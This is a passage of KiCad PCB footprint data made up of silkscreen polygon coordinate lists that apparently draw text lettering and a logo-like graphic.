(xy 17.654248 -9.521222) (xy 17.667539 -9.620338) (xy 17.706051 -9.800801) (xy 17.780609 -9.917875) (xy 17.906881 -9.986371) (xy 18.09042 -10.020084) (xy 18.330333 -10.044845) (xy 18.330333 -9.911922)) (layer F.SilkS) (width 0.01)) (fp_poly (pts (xy 33.866667 -7.958666) (xy 33.7185 -7.958666) (xy 33.616949 -7.96761) (xy 33.574554 -8.004727) (xy 33.566991 -8.053916) (xy 33.557138 -8.107014) (xy 33.542 -8.095359) (xy 33.468146 -8.014251) (xy 33.336734 -7.95635) (xy 33.172629 -7.925516) (xy 33.000698 -7.925609) (xy 32.84581 -7.960489) (xy 32.80224 -7.980528) (xy 32.708979 -8.05928) (xy 32.646004 -8.184208) (xy 32.609795 -8.366901) (xy 32.596828 -8.618951) (xy 32.596667 -8.657166) (xy 32.893 -8.657166) (xy 32.8994 -8.457404) (xy 32.924938 -8.327423) (xy 32.979122 -8.252888) (xy 33.071459 -8.219463) (xy 33.187799 -8.212666) (xy 33.354058 -8.229059) (xy 33.457585 -8.275495) (xy 33.461476 -8.27919) (xy 33.507963 -8.370455) (xy 33.534599 -8.513067) (xy 33.541676 -8.679784) (xy 33.529485 -8.843361) (xy 33.498317 -8.976555) (xy 33.453247 -9.04875) (xy 33.37128 -9.080553) (xy 33.243746 -9.099423) (xy 33.182731 -9.101666) (xy 33.052413 -9.091702) (xy 32.9676 -9.052294) (xy 32.918986 -8.969164) (xy 32.897267 -8.82804) (xy 32.893 -8.657166) (xy 32.596667 -8.657166) (xy 32.60651 -8.916529) (xy 32.638613 -9.105479) (xy 32.696835 -9.236243) (xy 32.785035 -9.321052) (xy 32.810821 -9.335786) (xy 32.991949 -9.389173) (xy 33.197387 -9.389483) (xy 33.386657 -9.338146) (xy 33.43275 -9.313797) (xy 33.570333 -9.229911) (xy 33.570333 -10.033) (xy 33.866667 -10.033) (xy 33.866667 -7.958666)) (layer F.SilkS) (width 0.01)) (fp_poly (pts (xy 30.612373 -9.390506) (xy 30.776911 -9.37749) (xy 30.882398 -9.355637) (xy 30.954448 -9.316399) (xy 31.01427 -9.256384) (xy 31.05439 -9.205142) (xy 31.082163 -9.150225) (xy 31.099849 -9.075753) (xy 31.109709 -8.965847) (xy 31.114004 -8.80463) (xy 31.114995 -8.576222) (xy 31.115 -8.548973) (xy 31.115 -7.958666) (xy 30.988 -7.958666) (xy 30.896088 -7.971111) (xy 30.863037 -8.019848) (xy 30.861 -8.050712) (xy 30.861 -8.142758) (xy 30.754587 -8.042788) (xy 30.654634 -7.975241) (xy 30.517995 -7.93759) (xy 30.402387 -7.92504) (xy 30.253514 -7.919484) (xy 30.155555 -7.934814) (xy 30.075775 -7.978831) (xy 30.033844 -8.012852) (xy 29.963227 -8.083006) (xy 29.927018 -8.156893) (xy 29.914769 -8.265263) (xy 29.91466 -8.344641) (xy 30.185266 -8.344641) (xy 30.222801 -8.234342) (xy 30.234467 -8.221133) (xy 30.320361 -8.183156) (xy 30.451232 -8.172016) (xy 30.592122 -8.186636) (xy 30.708074 -8.225939) (xy 30.72458 -8.236234) (xy 30.804442 -8.34071) (xy 30.818667 -8.426734) (xy 30.818667 -8.551333) (xy 30.526862 -8.551333) (xy 30.362133 -8.546731) (xy 30.264584 -8.530519) (xy 30.217108 -8.499089) (xy 30.209362 -8.484371) (xy 30.185266 -8.344641) (xy 29.91466 -8.344641) (xy 29.914633 -8.363714) (xy 29.927006 -8.529189) (xy 29.967163 -8.642334) (xy 30.048107 -8.712609) (xy 30.182839 -8.749472) (xy 30.384364 -8.762382) (xy 30.463523 -8.763) (xy 30.818667 -8.763) (xy 30.818667 -8.912214) (xy 30.797777 -9.022392) (xy 30.728729 -9.09404) (xy 30.601955 -9.131223) (xy 30.407886 -9.138007) (xy 30.300083 -9.132502) (xy 30.014333 -9.112971) (xy 30.014333 -9.232401) (xy 30.026489 -9.315835) (xy 30.079505 -9.358827) (xy 30.16277 -9.379677) (xy 30.282283 -9.391559) (xy 30.448606 -9.395238) (xy 30.612373 -9.390506)) (layer F.SilkS) (width 0.01)) (fp_poly (pts (xy 29.302824 -9.361234) (xy 29.441274 -9.284981) (xy 29.529168 -9.154763) (xy 29.575905 -8.961569) (xy 29.590886 -8.696389) (xy 29.591 -8.664843) (xy 29.582684 -8.409363) (xy 29.554735 -8.224092) (xy 29.502647 -8.095935) (xy 29.421917 -8.011798) (xy 29.353797 -7.975279) (xy 29.23028 -7.944868) (xy 29.054392 -7.926984) (xy 28.857668 -7.922826) (xy 28.671643 -7.933595) (xy 28.586427 -7.946099) (xy 28.493652 -7.991605) (xy 28.40651 -8.073043) (xy 28.368486 -8.131639) (xy 28.343567 -8.203953) (xy 28.329109 -8.308135) (xy 28.322471 -8.462335) (xy 28.321028 -8.65685) (xy 28.617333 -8.65685) (xy 28.618649 -8.468403) (xy 28.625085 -8.347254) (xy 28.640375 -8.276049) (xy 28.668251 -8.237429) (xy 28.712447 -8.21404) (xy 28.712583 -8.213986) (xy 28.876684 -8.175382) (xy 29.041527 -8.180774) (xy 29.174853 -8.227503) (xy 29.21 -8.255) (xy 29.255543 -8.316104) (xy 29.281585 -8.40081) (xy 29.292917 -8.531881) (xy 29.294667 -8.657166) (xy 29.290517 -8.832104) (xy 29.274873 -8.945403) (xy 29.242943 -9.019829) (xy 29.21 -9.059333) (xy 29.090753 -9.124762) (xy 28.92852 -9.143216) (xy 28.752431 -9.112087) (xy 28.725922 -9.102714) (xy 28.675673 -9.079951) (xy 28.643947 -9.046342) (xy 28.626489 -8.984414) (xy 28.619044 -8.876691) (xy 28.617355 -8.7057) (xy 28.617333 -8.65685) (xy 28.321028 -8.65685) (xy 28.321 -8.660515) (xy 28.322376 -8.871732) (xy 28.328532 -9.016689) (xy 28.342512 -9.113775) (xy 28.367359 -9.181378) (xy 28.406115 -9.237887) (xy 28.419107 -9.253335) (xy 28.480446 -9.3136) (xy 28.552613 -9.350802) (xy 28.659813 -9.372741) (xy 28.826252 -9.387217) (xy 28.836646 -9.38789) (xy 29.104415 -9.392534) (xy 29.302824 -9.361234)) (layer F.SilkS) (width 0.01)) (fp_poly (pts (xy 27.008667 -9.624272) (xy 27.009279 -9.436814) (xy 27.013271 -9.321256) (xy 27.023879 -9.264833) (xy 27.044336 -9.254777) (xy 27.077877 -9.278324) (xy 27.092904 -9.291778) (xy 27.186699 -9.342449) (xy 27.322848 -9.379178) (xy 27.378654 -9.386722) (xy 27.585398 -9.386723) (xy 27.740318 -9.338508) (xy 27.848944 -9.235071) (xy 27.916805 -9.069406) (xy 27.949429 -8.834507) (xy 27.954391 -8.657166) (xy 27.94093 -8.380144) (xy 27.896835 -8.176008) (xy 27.816531 -8.036773) (xy 27.694449 -7.954452) (xy 27.525017 -7.921061) (xy 27.439827 -7.919675) (xy 27.318206 -7.928006) (xy 27.227267 -7.943951) (xy 27.220333 -7.94623) (xy 27.143665 -7.990755) (xy 27.061583 -8.056101) (xy 26.966333 -8.142758) (xy 26.966333 -8.050712) (xy 26.949163 -7.984097) (xy 26.881918 -7.960143) (xy 26.839333 -7.958666) (xy 26.712333 -7.958666) (xy 26.712333 -8.664522) (xy 27.008667 -8.664522) (xy 27.018377 -8.461379) (xy 27.054186 -8.328055) (xy 27.126105 -8.251244) (xy 27.244148 -8.217642) (xy 27.348711 -8.212666) (xy 27.501949 -8.227542) (xy 27.59465 -8.268989) (xy 27.600853 -8.275588) (xy 27.629288 -8.353701) (xy 27.647566 -8.496131) (xy 27.653074 -8.657166) (xy 27.646547 -8.856978) (xy 27.620591 -8.987008) (xy 27.565645 -9.061566) (xy 27.47215 -9.094959) (xy 27.356066 -9.101666) (xy 27.197818 -9.088551) (xy 27.094772 -9.040261) (xy 27.036267 -8.943376) (xy 27.011637 -8.784479) (xy 27.008667 -8.664522) (xy 26.712333 -8.664522) (xy 26.712333 -10.033) (xy 27.008667 -10.033) (xy 27.008667 -9.624272)) (layer F.SilkS) (width 0.01)) (fp_poly (pts (xy 24.249416 -9.383422) (xy 24.406727 -9.332007) (xy 24.511689 -9.232227) (xy 24.576328 -9.072557) (xy 24.612675 -8.841472) (xy 24.613097 -8.837083) (xy 24.640358 -8.551333) (xy 23.657606 -8.551333) (xy 23.686596 -8.41375) (xy 23.718206 -8.30579) (xy 23.754517 -8.235051) (xy 23.755631 -8.233833) (xy 23.813568 -8.214957) (xy 23.934444 -8.200453) (xy 24.096563 -8.192506) (xy 24.174504 -8.191649) (xy 24.553333 -8.191798) (xy 24.553333 -8.08017) (xy 24.527893 -7.983861) (xy 24.458083 -7.943015) (xy 24.325023 -7.923592) (xy 24.146785 -7.918115) (xy 23.954372 -7.925263) (xy 23.778785 -7.943715) (xy 23.651025 -7.97215) (xy 23.635916 -7.978045) (xy 23.532642 -8.037263) (xy 23.462388 -8.119426) (xy 23.419369 -8.240133) (xy 23.397802 -8.414982) (xy 23.391937 -8.636) (xy 23.397018 -8.763) (xy 23.66645 -8.763) (xy 24.35225 -8.763) (xy 24.325221 -8.900583) (xy 24.271974 -9.04096) (xy 24.17385 -9.116821) (xy 24.020177 -9.135037) (xy 23.967568 -9.130941) (xy 23.829559 -9.108738) (xy 23.752013 -9.066477) (xy 23.710727 -8.983913) (xy 23.692156 -8.900583) (xy 23.66645 -8.763) (xy 23.397018 -8.763) (xy 23.402958 -8.911468) (xy 23.443312 -9.11465) (xy 23.521061 -9.255211) (xy 23.644273 -9.342817) (xy 23.82101 -9.387134) (xy 24.027728 -9.398) (xy 24.249416 -9.383422)) (layer F.SilkS) (width 0.01)) (fp_poly (pts (xy 20.186028 -9.38323) (xy 20.344131 -9.331259) (xy 20.450137 -9.230593) (xy 20.516146 -9.069738) (xy 20.55426 -8.837199) (xy 20.554272 -8.837083) (xy 20.583863 -8.551333) (xy 19.60245 -8.551333) (xy 19.628156 -8.41375) (xy 19.65721 -8.305627) (xy 19.691795 -8.234927) (xy 19.692769 -8.233833) (xy 19.750166 -8.214963) (xy 19.870585 -8.200461) (xy 20.032407 -8.19251) (xy 20.110504 -8.191649) (xy 20.489333 -8.191798) (xy 20.489333 -8.08017) (xy 20.463893 -7.983861) (xy 20.394083 -7.943015) (xy 20.261023 -7.923592) (xy 20.082785 -7.918115) (xy 19.890372 -7.925263) (xy 19.714785 -7.943715) (xy 19.587025 -7.97215) (xy 19.571916 -7.978045) (xy 19.469448 -8.036975) (xy 19.399736 -8.119078) (xy 19.357063 -8.239895) (xy 19.335715 -8.414971) (xy 19.329999 -8.636) (xy 19.340975 -8.911411) (xy 19.341132 -8.912214) (xy 19.642667 -8.912214) (xy 19.642667 -8.763) (xy 19.960167 -8.763) (xy 20.12166 -8.764319) (xy 20.216324 -8.772239) (xy 20.261992 -8.792705) (xy 20.276499 -8.831661) (xy 20.277667 -8.868833) (xy 20.241499 -9.001692) (xy 20.144008 -9.093906) (xy 20.001707 -9.138135) (xy 19.831112 -9.127044) (xy 19.751256 -9.102714) (xy 19.674832 -9.055974) (xy 19.645447 -8.974958) (xy 19.642667 -8.912214) (xy 19.341132 -8.912214) (xy 19.380874 -9.114484) (xy 19.457783 -9.254942) (xy 19.57979 -9.342509) (xy 19.754981 -9.38691) (xy 19.963728 -9.398) (xy 20.186028 -9.38323)) (layer F.SilkS) (width 0.01)) (fp_poly (pts (xy 16.669485 -9.386265) (xy 16.826737 -9.362454) (xy 16.910603 -9.337882) (xy 17.012872 -9.270642) (xy 17.082988 -9.161031) (xy 17.125036 -8.99716) (xy 17.143101 -8.767142) (xy 17.144528 -8.657166) (xy 17.134693 -8.398187) (xy 17.102466 -8.209983) (xy 17.043761 -8.080665) (xy 16.954492 -7.998346) (xy 16.910603 -7.976451) (xy 16.779545 -7.943663) (xy 16.598675 -7.925261) (xy 16.401782 -7.922251) (xy 16.222657 -7.935637) (xy 16.132816 -7.953311) (xy 16.023418 -8.001886) (xy 15.946602 -8.084669) (xy 15.897645 -8.214043) (xy 15.871825 -8.402393) (xy 15.864427 -8.65685) (xy 16.171333 -8.65685) (xy 16.172649 -8.468403) (xy 16.179085 -8.347254) (xy 16.194375 -8.276049) (xy 16.222251 -8.237429) (xy 16.266447 -8.21404) (xy 16.266583 -8.213986) (xy 16.415079 -8.179224) (xy 16.575467 -8.178425) (xy 16.709554 -8.210278) (xy 16.745325 -8.230421) (xy 16.785997 -8.271699) (xy 16.810766 -8.335423) (xy 16.823328 -8.440794) (xy 16.827382 -8.607011) (xy 16.8275 -8.657166) (xy 16.824914 -8.840532) (xy 16.814691 -8.958524) (xy 16.793134 -9.03034) (xy 16.756547 -9.075182) (xy 16.745325 -9.083912) (xy 16.620864 -9.132231) (xy 16.457454 -9.140397) (xy 16.291461 -9.106942) (xy 16.279922 -9.102714) (xy 16.229673 -9.079951) (xy 16.197947 -9.046342) (xy 16.180489 -8.984414) (xy 16.173044 -8.876691) (xy 16.171355 -8.7057) (xy 16.171333 -8.65685) (xy 15.864427 -8.65685) (xy 15.864417 -8.657166) (xy 15.871569 -8.922473) (xy 15.899644 -9.115317) (xy 15.958563 -9.247185) (xy 16.058251 -9.329564) (xy 16.20863 -9.37394) (xy 16.419624 -9.391801) (xy 16.500776 -9.39378) (xy 16.669485 -9.386265)) (layer F.SilkS) (width 0.01)) (fp_poly (pts (xy 15.121975 -9.88769) (xy 15.129455 -9.8869) (xy 15.278501 -9.869425) (xy 15.362213 -9.849894) (xy 15.399443 -9.817249) (xy 15.409045 -9.760432) (xy 15.409374 -9.722714) (xy 15.409416 -9.5885) (xy 14.989888 -9.60293) (xy 14.794926 -9.608087) (xy 14.665208 -9.605491) (xy 14.581448 -9.592188) (xy 14.524359 -9.565224) (xy 14.477437 -9.524437) (xy 14.410678 -9.42688) (xy 14.408748 -9.31073) (xy 14.410531 -9.301427) (xy 14.433385 -9.205749) (xy 14.452402 -9.155506) (xy 14.452723 -9.155165) (xy 14.498969 -9.142548) (xy 14.609832 -9.121987) (xy 14.766025 -9.096891) (xy 14.865032 -9.082282) (xy 15.045788 -9.05457) (xy 15.19947 -9.027649) (xy 15.303342 -9.005656) (xy 15.329516 -8.997791) (xy 15.41707 -8.91675) (xy 15.47196 -8.759055) (xy 15.493644 -8.526389) (xy 15.494 -8.486509) (xy 15.489335 -8.328587) (xy 15.469018 -8.223552) (xy 15.423565 -8.13985) (xy 15.370553 -8.075751) (xy 15.247106 -7.9375) (xy 14.809636 -7.93148) (xy 14.612531 -7.930774) (xy 14.435926 -7.933744) (xy 14.304269 -7.9398) (xy 14.25575 -7.944875) (xy 14.170693 -7.974871) (xy 14.141136 -8.044751) (xy 14.139333 -8.088478) (xy 14.139333 -8.212666) (xy 14.601976 -8.212666) (xy 14.820816 -8.215366) (xy 14.970334 -8.224738) (xy 15.065739 -8.242696) (xy 15.122242 -8.271152) (xy 15.131143 -8.27919) (xy 15.178272 -8.372568) (xy 15.196507 -8.502588) (xy 15.18207 -8.625041) (xy 15.164144 -8.665527) (xy 15.110775 -8.692947) (xy 14.993109 -8.725831) (xy 14.830873 -8.759231) (xy 14.714492 -8.778336) (xy 14.480156 -8.818736) (xy 14.31682 -8.865427) (xy 14.210933 -8.92912) (xy 14.148945 -9.020527) (xy 14.117306 -9.15036) (xy 14.10671 -9.258772) (xy 14.109255 -9.49108) (xy 14.156654 -9.660771) (xy 14.252591 -9.77921) (xy 14.282331 -9.800673) (xy 14.420092 -9.856281) (xy 14.619709 -9.89072) (xy 14.860548 -9.90189) (xy 15.121975 -9.88769)) (layer F.SilkS) (width 0.01)) (fp_poly (pts (xy 25.153488 -9.39033) (xy 25.294167 -9.376833) (xy 25.315333 -8.847666) (xy 25.326057 -8.641083) (xy 25.339878 -8.463308) (xy 25.355061 -8.332569) (xy 25.369872 -8.267097) (xy 25.370748 -8.265583) (xy 25.436901 -8.22919) (xy 25.552321 -8.214599) (xy 25.684596 -8.221329) (xy 25.801313 -8.248898) (xy 25.846992 -8.272666) (xy 25.881796 -8.306954) (xy 25.906131 -8.360292) (xy 25.922467 -8.447898) (xy 25.933274 -8.58499) (xy 25.941023 -8.786786) (xy 25.943202 -8.865332) (xy 25.957238 -9.398) (xy 26.246667 -9.398) (xy 26.246601 -8.583083) (xy 26.244008 -8.230469) (xy 26.232556 -7.953387) (xy 26.206643 -7.742765) (xy 26.160666 -7.589531) (xy 26.089019 -7.484613) (xy 25.986102 -7.418939) (xy 25.846309 -7.383438) (xy 25.664038 -7.369037) (xy 25.49525 -7.366624) (xy 25.103667 -7.366) (xy 25.103667 -7.611312) (xy 25.466913 -7.626239) (xy 25.677623 -7.641825) (xy 25.817587 -7.67459) (xy 25.90041 -7.734442) (xy 25.939699 -7.831292) (xy 25.949062 -7.975047) (xy 25.949046 -7.977341) (xy 25.944245 -8.079141) (xy 25.92923 -8.105825) (xy 25.905311 -8.076337) (xy 25.826247 -8.010164) (xy 25.691757 -7.959753) (xy 25.53066 -7.932387) (xy 25.37177 -7.935349) (xy 25.356669 -7.937668) (xy 25.245553 -7.96235) (xy 25.163701 -8.001447) (xy 25.106304 -8.067083) (xy 25.068553 -8.171382) (xy 25.045641 -8.326468) (xy 25.032759 -8.544466) (xy 25.026488 -8.770224) (xy 25.01281 -9.403826) (xy 25.153488 -9.39033)) (layer F.SilkS) (width 0.01)) (fp_poly (pts (xy 17.145 -5.164666) (xy 16.806333 -5.164666) (xy 16.806333 -5.926666) (xy 16.805806 -6.208415) (xy 16.802314 -6.414956) (xy 16.792991 -6.555751) (xy 16.774969 -6.640259) (xy 16.745382 -6.677941) (xy 16.701363 -6.678256) (xy 16.640046 -6.650664) (xy 16.594667 -6.625166) (xy 16.492811 -6.5744) (xy 16.442669 -6.579972) (xy 16.426636 -6.649609) (xy 16.425835 -6.69925) (xy 16.433583 -6.777495) (xy 16.467385 -6.837458) (xy 16.544102 -6.897624) (xy 16.67684 -6.974416) (xy 16.822434 -7.04568) (xy 16.954282 -7.0954) (xy 17.036171 -7.112) (xy 17.145 -7.112) (xy 17.145 -5.164666)) (layer F.SilkS) (width 0.01)) (fp_poly (pts (xy 15.532536 -6.593911) (xy 15.578018 -6.569252) (xy 15.578667 -6.565568) (xy 15.565316 -6.514685) (xy 15.528333 -6.397906) (xy 15.472323 -6.229154) (xy 15.401888 -6.022352) (xy 15.340705 -5.845901) (xy 15.102744 -5.164666) (xy 14.906788 -5.164836) (xy 14.710833 -5.165005) (xy 14.478 -5.847174) (xy 14.400322 -6.074536) (xy 14.33183 -6.274592) (xy 14.277343 -6.433299) (xy 14.241679 -6.536618) (xy 14.230115 -6.569493) (xy 14.256975 -6.59203) (xy 14.343126 -6.598132) (xy 14.375009 -6.596238) (xy 14.534955 -6.582833) (xy 14.726008 -6.011333) (xy 14.91706 -5.439833) (xy 15.106537 -6.021916) (xy 15.296013 -6.604) (xy 15.43734 -6.604) (xy 15.532536 -6.593911)) (layer F.SilkS) (width 0.01)) (fp_poly (pts (xy 5.525076 -14.710217) (xy 5.617448 -14.593052) (xy 5.671753 -14.491654) (xy 5.737128 -14.296193) (xy 5.764176 -14.063362) (xy 5.752229 -13.78537) (xy 5.700618 -13.454427) (xy 5.608674 -13.062741) (xy 5.522913 -12.758195) (xy 5.511594 -12.707761) (xy 5.528908 -12.68754) (xy 5.592582 -12.694689) (xy 5.720341 -12.72636) (xy 5.720668 -12.726445) (xy 5.940047 -12.772426) (xy 6.112629 -12.779426) (xy 6.266837 -12.747327) (xy 6.328686 -12.723956) (xy 6.454372 -12.636295) (xy 6.510363 -12.518207) (xy 6.498076 -12.385218) (xy 6.418927 -12.252852) (xy 6.275138 -12.137104) (xy 6.169224 -12.088043) (xy 6.011041 -12.029611) (xy 5.830538 -11.972644) (xy 5.785357 -11.95988) (xy 5.538844 -11.887042) (xy 5.360918 -11.819921) (xy 5.236743 -11.749753) (xy 5.151488 -11.667773) (xy 5.090319 -11.565217) (xy 5.080512 -11.543411) (xy 5.050789 -11.452122) (xy 5.014174 -11.306093) (xy 4.97391 -11.122815) (xy 4.933241 -10.919777) (xy 4.89541 -10.714469) (xy 4.86366 -10.524381) (xy 4.841235 -10.367003) (xy 4.831376 -10.259824) (xy 4.835334 -10.221222) (xy 4.880321 -10.220754) (xy 4.992219 -10.229736) (xy 5.154055 -10.246118) (xy 5.348859 -10.26785) (xy 5.559657 -10.292884) (xy 5.769479 -10.31917) (xy 5.961353 -10.344658) (xy 6.118306 -10.367301) (xy 6.223367 -10.385049) (xy 6.25475 -10.392605) (xy 6.302672 -10.387285) (xy 6.307667 -10.372721) (xy 6.343614 -10.333351) (xy 6.442086 -10.265532) (xy 6.589025 -10.176923) (xy 6.770374 -10.075182) (xy 6.972075 -9.967968) (xy 7.180072 -9.862939) (xy 7.380307 -9.767754) (xy 7.558723 -9.690072) (xy 7.566352 -9.686973) (xy 7.78069 -9.606358) (xy 8.011065 -9.529407) (xy 8.21756 -9.46919) (xy 8.275436 -9.454804) (xy 8.44547 -9.408358) (xy 8.555587 -9.363475) (xy 8.593667 -9.325884) (xy 8.622441 -9.275359) (xy 8.640799 -9.271) (xy 8.652106 -9.23049) (xy 8.660191 -9.116121) (xy 8.665175 -8.938635) (xy 8.667181 -8.708773) (xy 8.666329 -8.437277) (xy 8.662743 -8.134889) (xy 8.656544 -7.81235) (xy 8.647853 -7.480402) (xy 8.636794 -7.149787) (xy 8.623487 -6.831246) (xy 8.610173 -6.57225) (xy 8.585519 -6.138333) (xy 8.69968 -6.138333) (xy 8.808406 -6.146916) (xy 8.974633 -6.170162) (xy 9.179129 -6.204318) (xy 9.402662 -6.245632) (xy 9.626 -6.29035) (xy 9.829912 -6.334719) (xy 9.995167 -6.374987) (xy 10.102532 -6.4074) (xy 10.12248 -6.415989) (xy 10.20247 -6.469393) (xy 10.269505 -6.547082) (xy 10.330735 -6.663112) (xy 10.39331 -6.831542) (xy 10.464382 -7.066427) (xy 10.478179 -7.115244) (xy 10.560521 -7.382179) (xy 10.639742 -7.576963) (xy 10.722537 -7.711542) (xy 10.815603 -7.79786) (xy 10.879791 -7.831718) (xy 11.016137 -7.853275) (xy 11.129015 -7.804174) (xy 11.214494 -7.696139) (xy 11.268641 -7.540894) (xy 11.287524 -7.350164) (xy 11.267212 -7.135672) (xy 11.203772 -6.909144) (xy 11.195969 -6.88896) (xy 11.184425 -6.840543) (xy 11.21894 -6.836626) (xy 11.287584 -6.860311) (xy 11.470328 -6.91942) (xy 11.700932 -6.978885) (xy 11.952405 -7.033251) (xy 12.197757 -7.077064) (xy 12.409997 -7.104872) (xy 12.532938 -7.111945) (xy 12.727602 -7.094235) (xy 12.920875 -7.046681) (xy 13.090998 -6.977759) (xy 13.216211 -6.895945) (xy 13.270287 -6.824729) (xy 13.25998 -6.749603) (xy 13.197782 -6.670362) (xy 13.110288 -6.614646) (xy 13.057899 -6.604) (xy 12.978977 -6.589681) (xy 12.885916 -6.559924) (xy 12.769986 -6.515847) (xy 12.914456 -6.443507) (xy 13.03504 -6.350339) (xy 13.107331 -6.228529) (xy 13.117265 -6.104244) (xy 13.109925 -6.079787) (xy 13.055558 -6.030417) (xy 12.934718 -6.010763) (xy 12.902412 -6.010046) (xy 12.795851 -6.006431) (xy 12.763451 -5.99421) (xy 12.794776 -5.968183) (xy 12.805833 -5.961931) (xy 12.968605 -5.846354) (xy 13.058421 -5.724158) (xy 13.072111 -5.603297) (xy 13.006503 -5.491723) (xy 12.996901 -5.482681) (xy 12.898766 -5.425412) (xy 12.7624 -5.40571) (xy 12.571058 -5.422034) (xy 12.488333 -5.435913) (xy 12.297833 -5.470716) (xy 12.410344 -5.381191) (xy 12.499547 -5.319943) (xy 12.564579 -5.291858) (xy 12.567765 -5.291666) (xy 12.593697 -5.259228) (xy 12.569313 -5.161084) (xy 12.523505 -5.055408) (xy 12.496461 -5.009695) (xy 12.456911 -4.988431) (xy 12.383645 -4.989352) (xy 12.255454 -5.010194) (xy 12.199063 -5.020757) (xy 11.973491 -5.068713) (xy 11.802921 -5.121038) (xy 11.658014 -5.189523) (xy 11.509432 -5.285959) (xy 11.472333 -5.312833) (xy 11.380092 -5.380016) (xy 11.299826 -5.432305) (xy 11.220666 -5.470112) (xy 11.131743 -5.493846) (xy 11.022187 -5.50392) (xy 10.88113 -5.500741) (xy 10.697703 -5.484723) (xy 10.461036 -5.456273) (xy 10.160261 -5.415804) (xy 9.857318 -5.373821) (xy 9.547514 -5.331006) (xy 9.264742 -5.292257) (xy 9.019942 -5.259047) (xy 8.824052 -5.232848) (xy 8.688009 -5.215133) (xy 8.622752 -5.207373) (xy 8.619211 -5.207146) (xy 8.613818 -5.166075) (xy 8.609477 -5.048037) (xy 8.606138 -4.860723) (xy 8.603752 -4.611825) (xy 8.60227 -4.309035) (xy 8.601645 -3.960044) (xy 8.601826 -3.572545) (xy 8.602765 -3.15423) (xy 8.604412 -2.71279) (xy 8.60672 -2.255917) (xy 8.609639 -1.791303) (xy 8.61312 -1.32664) (xy 8.617114 -0.86962) (xy 8.621573 -0.427934) (xy 8.626447 -0.009275) (xy 8.631688 0.378666) (xy 8.637246 0.728197) (xy 8.643073 1.031626) (xy 8.64912 1.281261) (xy 8.655338 1.469411) (xy 8.661677 1.588383) (xy 8.662483 1.598084) (xy 8.674196 1.758625) (xy 8.672502 1.852072) (xy 8.655295 1.895239) (xy 8.624049 1.905) (xy 8.557024 1.930452) (xy 8.542921 1.951404) (xy 8.510131 1.966496) (xy 8.420079 1.974535) (xy 8.266625 1.975502) (xy 8.043628 1.96938) (xy 7.744951 1.956149) (xy 7.597476 1.948574) (xy 7.390488 1.939591) (xy 7.109014 1.930385) (xy 6.763236 1.921154) (xy 6.363332 1.912093) (xy 5.919484 1.903399) (xy 5.441872 1.895269) (xy 4.940675 1.887897) (xy 4.426075 1.881481) (xy 3.908251 1.876217) (xy 3.79276 1.875215) (xy 0.918021 1.85109) (xy 0.946662 2.523628) (xy 0.959287 2.815115) (xy 0.973486 3.134962) (xy 0.987663 3.447648) (xy 1.000222 3.717657) (xy 1.002189 3.759011) (xy 1.029073 4.321856) (xy 1.138953 4.301661) (xy 1.382776 4.260124) (xy 1.607692 4.227841) (xy 1.797474 4.20664) (xy 1.935898 4.198348) (xy 2.00516 4.204132) (xy 2.054266 4.265541) (xy 2.07189 4.3891) (xy 2.06065 4.559463) (xy 2.023166 4.761285) (xy 1.962057 4.979218) (xy 1.879942 5.197919) (xy 1.810444 5.345018) (xy 1.740317 5.479911) (xy 1.686494 5.584072) (xy 1.660161 5.635851) (xy 1.659788 5.636632) (xy 1.694693 5.646119) (xy 1.799442 5.653269) (xy 1.959234 5.657534) (xy 2.159264 5.658365) (xy 2.230984 5.657799) (xy 2.55801 5.658078) (xy 2.813127 5.668088) (xy 3.008727 5.689715) (xy 3.157205 5.724845) (xy 3.270952 5.775362) (xy 3.344132 5.82716) (xy 3.448292 5.962417) (xy 3.47271 6.125139) (xy 3.417387 6.314337) (xy 3.344008 6.443044) (xy 3.205309 6.617673) (xy 3.03495 6.764368) (xy 2.824997 6.885816) (xy 2.567517 6.984705) (xy 2.254576 7.063723) (xy 1.878239 7.125557) (xy 1.430573 7.172896) (xy 1.122556 7.195579) (xy 0.770313 7.216687) (xy 0.490941 7.229564) (xy 0.27303 7.234107) (xy 0.105175 7.230211) (xy -0.02403 7.217769) (xy -0.125994 7.196678) (xy -0.167905 7.183694) (xy -0.285911 7.118065) (xy -0.373788 7.02709) (xy -0.377828 7.020249) (xy -0.40622 6.958608) (xy -0.416573 6.891859) (xy -0.411013 6.834673) (xy -0.117712 6.834673) (xy -0.113886 6.873449) (xy -0.094448 6.899496) (xy -0.051157 6.91811) (xy 0.028166 6.930447) (xy 0.155696 6.937661) (xy 0.343611 6.940908) (xy 0.601921 6.941346) (xy 0.885233 6.936864) (xy 1.186201 6.925478) (xy 1.473869 6.908763) (xy 1.717285 6.888293) (xy 1.778 6.881542) (xy 1.99729 6.851003) (xy 2.208675 6.81427) (xy 2.384421 6.77654) (xy 2.4765 6.750601) (xy 2.705096 6.65343) (xy 2.900538 6.534229) (xy 3.054255 6.402616) (xy 3.157678 6.26821) (xy 3.202235 6.140632) (xy 3.179357 6.029499) (xy 3.151076 5.993457) (xy 3.118454 5.96892) (xy 3.068967 5.950864) (xy 2.991075 5.938516) (xy 2.873236 5.931104) (xy 2.703912 5.927854) (xy 2.47156 5.927993) (xy 2.208078 5.930281) (xy 1.911834 5.932747) (xy 1.689146 5.932536) (xy 1.528928 5.928912) (xy 1.420092 5.921143) (xy 1.351552 5.908494) (xy 1.31222 5.890231) (xy 1.293456 5.869723) (xy 1.274465 5.784831) (xy 1.309283 5.704563) (xy 1.424757 5.506781) (xy 1.535092 5.293289) (xy 1.634392 5.078649) (xy 1.71676 4.87742) (xy 1.776297 4.704164) (xy 1.807107 4.57344) (xy 1.803292 4.499811) (xy 1.799348 4.494571) (xy 1.751082 4.490902) (xy 1.639693 4.498516) (xy 1.485732 4.515783) (xy 1.419159 4.524702) (xy 1.218105 4.548772) (xy 0.97058 4.572491) (xy 0.714726 4.592413) (xy 0.573674 4.601079) (xy 0.088154 4.627098) (xy 0.087795 5.131562) (xy 0.086628 5.361638) (xy 0.081689 5.543522) (xy 0.070255 5.701681) (xy 0.049606 5.860581) (xy 0.017021 6.044688) (xy -0.030222 6.278468) (xy -0.050613 6.376032) (xy -0.085841 6.562129) (xy -0.109099 6.722018) (xy -0.117712 6.834673) (xy -0.411013 6.834673) (xy -0.407551 6.79907) (xy -0.377819 6.659307) (xy -0.34677 6.533415) (xy -0.272088 6.207787) (xy -0.220456 5.904374) (xy -0.188547 5.594094) (xy -0.173037 5.24787) (xy -0.170172 4.989279) (xy -0.169301 4.746792) (xy -0.163269 4.576295) (xy -0.145722 4.465121) (xy -0.110303 4.400603) (xy -0.050656 4.370072) (xy 0.039576 4.360862) (xy 